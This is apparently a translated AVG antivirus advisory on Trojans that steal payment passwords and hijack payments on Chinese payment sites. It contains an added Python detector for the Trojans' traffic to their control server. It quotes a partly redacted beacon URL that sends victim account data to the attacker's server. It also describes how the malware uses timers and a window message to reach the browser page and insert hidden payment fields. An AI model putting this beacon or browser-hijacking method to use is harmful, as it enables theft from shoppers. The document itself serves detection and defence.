The end of the year brings the annual promotional frenzy, and the major online shopping sites pull out every trick to attract customers. According to the latest figures, the well-known domestic shopping platform Taobao launched its nationwide "crazy grab" promotion on December 12, and within one hour the turnover reached 475 million, spread over 2.78 million transactions. Dazzling promotions attract not only large numbers of online shoppers but also the attention of many attackers. Recently, the AVG China Virus Laboratory intercepted a large number of Trojans targeting domestic payment platforms, including Hundred, Sheng, fast money, news, Yi Bao, Alipay and others. The scope has also widened: in addition to online shopping sites, the recharge sites of some game companies fall within this class of Trojan's attack range, for example perfect, more play, 4399 online games, Journey games and others. Most of these Trojans are produced by some kind of builder, and the Trojan author supplies a back-end management system for them.
There is no obvious change in the way this malware spreads: it mostly relies on social engineering, disguising itself as a Word document, an image file or a text file to induce the user to click. The main goal of the attack is to steal the user's payment account password and to tamper with the user's payment details. Let's take a closer look at this kind of Trojan and uncover how it works.
Most of the samples intercepted so far carry the icon of a Word document. Such a file may arrive as a mail attachment, or a "seller" may send it as product information. When this kind of Trojan runs, it first connects to Baidu to determine whether the network is reachable, and only then connects to the attacker's back-end server. The request takes the following form:
Http://119.***.***.48:858/api/163/post.php? username=aucodehu&bank=icbc&money=88 (link redacted)
The username and bank fields in this request let the operator manage the stolen proceeds and attribute them to an affiliate. The Trojan then collects some basic information about the system and sends it to the same back-end system.
This includes the local IP address, operating system version and geographic location.
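The beacon described above has a recognisable shape: a connectivity probe to Baidu, then a request to a bare IP address on a non-standard port carrying username and bank parameters. The following is an added Python example, not code from the article or from AVG, that scans constructed proxy-log lines for that sequence; the IP 198.51.100.7, the client addresses and the log format are all constructed.

```python
from datetime import datetime
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log (not from the original article):
# "<ISO timestamp> <client IP> <method> <URL>"
SAMPLE_LOG = """\
2012-12-12T10:00:00 10.0.0.5 GET http://www.baidu.com/
2012-12-12T10:00:01 10.0.0.5 GET http://198.51.100.7:858/api/163/post.php?username=aucodehu&bank=icbc&money=88
2012-12-12T10:00:03 10.0.0.9 GET http://www.example.com/api/163/post.php?username=bob&bank=icbc
2012-12-12T10:05:00 10.0.0.5 POST https://shop.example.com/checkout
"""

BEACON_KEYS = {"username", "bank"}          # parameters seen in the intercepted request
CONNECTIVITY_HOSTS = {"www.baidu.com", "baidu.com"}
WINDOW_SECONDS = 60                         # probe-to-beacon window (assumption)

def parse_line(line):
    ts, src, _method, url = line.split(maxsplit=3)
    return datetime.fromisoformat(ts), src, urlsplit(url)

def is_bare_ip(hostname):
    try:
        ip_address(hostname)
        return True
    except ValueError:
        return False

def looks_like_beacon(parts):
    # Bare IP host, non-standard port, post.php endpoint and the account parameters.
    if parts.hostname is None or not is_bare_ip(parts.hostname):
        return False
    if parts.port in (None, 80, 443):
        return False
    if not parts.path.endswith("/post.php"):
        return False
    return BEACON_KEYS <= set(parse_qs(parts.query))

def find_beacons(log_text):
    alerts = []
    last_probe = {}  # client IP -> time of its most recent connectivity probe
    for line in log_text.strip().splitlines():
        ts, src, parts = parse_line(line)
        if parts.hostname in CONNECTIVITY_HOSTS:
            last_probe[src] = ts
            continue
        if looks_like_beacon(parts):
            probe = last_probe.get(src)
            preceded = probe is not None and (ts - probe).total_seconds() <= WINDOW_SECONDS
            alerts.append({"src": src, "host": parts.hostname, "port": parts.port,
                           "params": {k: v[0] for k, v in parse_qs(parts.query).items()},
                           "preceded_by_probe": preceded})
    return alerts
```

Requests to a legitimate domain with the same parameter names are not flagged, because the rule requires a bare IP host on an unusual port as well as the parameter set.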
With this preparation done, the Trojan begins monitoring the user's browser. Unlike earlier families that relied on code injection or API hijacking, these Trojans use a simpler and quite effective method: timers. This approach may be overlooked by some active-defence products. A Trojan of this kind generally sets up three or more timers, each firing at an interval of 200 milliseconds, which is short enough to track the user's actions on the site. One of the timers calls GetCursorPos to read the current mouse position and from that obtains the handle of the window under the cursor. It then sends a WM_HTML_GETOBJECT message to the WebBrowser control (window class name "Internet Explorer_Server") to obtain the IHTMLDocument object. Once it holds this object, the Trojan author can do anything to the page: parse its elements, steal any content of interest, tamper with payment information, and so on. The following is a string fragment intercepted from the virus:
It also inserts some hidden elements into the page. These are not displayed, but they are the ones that actually do the work:
Once the user clicks Submit, the hidden content on these pages is submitted along with the form, and the user suffers information theft and financial loss. Meanwhile, the virus sets up other timers that close the payment site's environment-check page and its payment-failure page, so that the user does not see them.
To protect against this kind of Trojan, pay attention to the following points:
1. Keep anti-virus software updated.
2. Do not open any document you did not request yourself.
3. Check that the file type matches its icon and extension.
4. When shopping online, if the payment environment-check page is closed unexpectedly, stop the payment immediately.
5. Check whether the payment page has been modified.
AVG already detects this type of virus; users who leave updates enabled and keep their virus database current can effectively prevent the attack. At the same time, the AVG China Laboratory reminds all netizens that the end of the year is a high-risk period for outbreaks of all kinds of network viruses, and that everyday browsing, and especially anything involving financial transactions, calls for extra caution.